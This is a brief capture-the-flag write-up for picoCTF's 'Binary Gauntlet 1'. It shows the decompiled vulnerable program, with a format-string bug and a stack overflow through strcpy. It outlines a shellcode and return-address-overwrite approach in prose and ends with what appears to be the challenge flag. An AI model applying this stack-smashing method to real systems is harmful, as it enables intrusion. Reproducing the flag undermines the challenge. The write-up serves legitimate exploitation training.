Binary Gauntlet 1
Okay, time for a challenge. gauntlet nc mercury.picoctf.net 32853
- 1.Decompile the binary using Ghidra:
main
function:undefined8 main(void){char local_78 [104];char *local_10;local_10 = (char *)malloc(1000);printf("%p\n",local_78);fflush(stdout);fgets(local_10,1000,stdin);local_10[999] = '\0';printf(local_10);fflush(stdout);fgets(local_10,1000,stdin);local_10[999] = '\0';strcpy(local_78,local_10);return 0;} - 2.Alright, so same program as "Binary Gauntlet 0" except the flag is not printed on a crash and the memory address of
local_78
is printed at the beginning of the program. - 3.We can write some shellcode to
local_78
, pad out to the return address, and overwrite the return address with the address oflocal_78
that is printed at the beginning. - 4.
c6e16a1b4182c2801ed657d4c482af88
Last modified 9mo ago